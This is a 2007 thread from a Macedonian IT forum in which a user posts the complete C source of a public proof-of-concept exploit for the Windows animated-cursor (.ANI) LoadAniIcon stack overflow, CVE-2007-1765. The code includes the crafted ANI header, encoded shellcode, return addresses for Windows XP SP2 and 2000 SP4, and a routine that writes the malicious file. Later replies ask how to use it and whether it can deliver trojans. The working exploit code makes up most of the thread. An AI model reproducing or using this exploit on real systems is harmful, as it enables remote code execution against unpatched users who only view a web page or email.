• Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.

Windows .ANI Stack Overflow Exploit

  • Ја почнал/а темата S
  • Време на почнување
Статус
Затворена за нови мислења.
  • Ја почнал/а темата
  • #1

S

pwnz0r1lla
8 март 2007
1,550
52
www.it.com.mk
Ushte edna od plejadata fantastichni dupki na Microsoft :p ... Ovaa lezhi vo LoadAniIcon() funkcijata na USER32.DLL i koja mozhe da se iskoristi za izvrshuvanje zlonameren kod so toa shtto zhrtvata kje se navede samo da pogledne 'dobro spakuvana' html strana.

Povekje detali vo originalniot izveshtaj:
http://www.determina.com/security.research/vulnerabilities/ani-header.html

Код:
/* 
* Copyright (c) 2007 devcode 
* 
* 
* ^^ D E V C O D E ^^ 
* 
* Windows .ANI LoadAniIcon Stack Overflow 
* [CVE-2007-1765] 
* 
* 
* Description: 
* A vulnerability has been identified in Microsoft Windows, 
* which could be exploited by remote attackers to take complete 
* control of an affected system. This issue is due to a stack overflow 
* error within the "LoadAniIcon()" [user32.dll] function when rendering 
* cursors, animated cursors or icons with a malformed header, which could 
* be exploited by remote attackers to execute arbitrary commands by 
* tricking a user into visiting a malicious web page or viewing an email 
* message containing a specially crafted ANI file. 
* 
* Hotfix/Patch: 
* None as of this time. 
* 
* Vulnerable systems: 
* Microsoft Windows 2000 Service Pack 4 
* Microsoft Windows XP Service Pack 2 
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) 
* Microsoft Windows XP Professional x64 Edition 
* Microsoft Windows Server 2003 
* Microsoft Windows Server 2003 (Itanium) 
* Microsoft Windows Server 2003 Service Pack 1 
* Microsoft Windows Server 2003 Service Pack 1 (Itanium) 
* Microsoft Windows Server 2003 x64 Edition 
* Microsoft Windows Vista 
* 
* Microsoft Internet Explorer 6 
* Microsoft Internet Explorer 7 
* 
* This is a PoC and was created for educational purposes only. The 
* author is not held responsible if this PoC does not work or is 
* used for any other purposes than the one stated above. 
* 
* Notes: 
* For this to work on XP SP2 on explorer.exe, DEP has to be turned 
* off. 
* 
*/ 
#include <iostream> 

/* ANI Header */ 
unsigned char uszAniHeader[] = 
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68" 
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00" 
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02" 
"\x61\x6E\x69\x68\xA8\x03\x00\x00"; 

/* Shellcode - metasploit exec calc.exe ^^ */ 
unsigned char uszShellcode[] = 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" 
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42" 
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32" 
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a" 
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c" 
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57" 
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50" 
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d" 
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f" 
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a" 
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76" 
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65" 
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78" 
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f" 
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65" 
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d" 
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31" 
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69" 
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61" 
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70" 
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42"; 

char szIntro[] = 
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n" 
"\t\t\tdevcode (c) 2007\n" 
"[+] Targets:\n" 
"\tWindows XP SP2 [0]\n" 
"\tWindows 2K SP4 [1]\n\n" 
"Usage: ani.exe <target> <file>"; 

typedef struct { 
const char *szTarget; 
unsigned char uszRet[5]; 
} TARGET; 

TARGET targets[] = { 
{ "Windows XP SP2", "\xC9\x29\xD4\x77" }, /* call esp */ 
{ "Windows 2K SP4", "\x29\x4C\xE1\x77" } 
}; 

int main( int argc, char **argv ) { 
char szBuffer[1024]; 
FILE *f; 

if ( argc < 3 ) { 
printf("%s\n", szIntro ); 
return 0; 
} 

printf("[+] Creating ANI header...\n"); 
memset( szBuffer, 0x90, sizeof( szBuffer ) ); 
memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); 

printf("[+] Copying shellcode...\n"); 
memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); 
memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 ); 

printf("%s\n", argv[2] ); 
f = fopen( argv[2], "wb" ); 
if ( f == NULL ) { 
printf("[-] Cannot create file\n"); 
return 0; 
} 

fwrite( szBuffer, 1, 1024, f ); 
fclose( f ); 
printf("[+] .ANI file succesfully created!\n"); 
return 0; 
}
toa ti e...

Stefan.
 

n3tG0d

Intern
9 април 2007
115
1
cekaj g kopialjirav i go podignav na pc so imam vo mreza staveno ... i mi napravi samo eden fajl... i niso poveke... mora da ima nekoja finta.
 
  • Ја почнал/а темата
  • #6

S

pwnz0r1lla
8 март 2007
1,550
52
www.it.com.mk
pa i treba da ti napravi fajl, toa e exploitot, stranata koja treba da se otvori za da kodot se izvrshi.. (eden od nachinite na upotreba)
 

Lightlord

Intern
6 април 2007
86
1
Овоа е пишувано во Ц++ или Ц? Или слични се па затоа се бунам?
 

Lightlord

Intern
6 април 2007
86
1
Не сваќам што е финтата, дури и коментарите се С стил, а има C++ included file... чудна работа ама вероватно тие што го праеле знаат што е работата нема што ние тука да расправаме.
 

HyBRiD_HeLL

Intern
13 април 2007
106
1
c++ definitvno.
C++ ot ima podrska za c zatoa ustvari e c/c++
a ostanatoto sekercinja gotovi char setovi.

Da go iskoristam postov za da prasam dali nekoj od vas pravi exploiti?
 

staki

Intern
26 јуни 2007
147
3
Ako moze malku poveke da mi pojasnite. Se pravi fajl koj sto moze da sodrzi nekoi virusi kako trojanci ?????
 
Статус
Затворена за нови мислења.

Нови мислења

Последни Теми

Статистика

Теми
43,510
Мислења
822,303
Членови
28,048
Најнов член
milesp
На врв Дно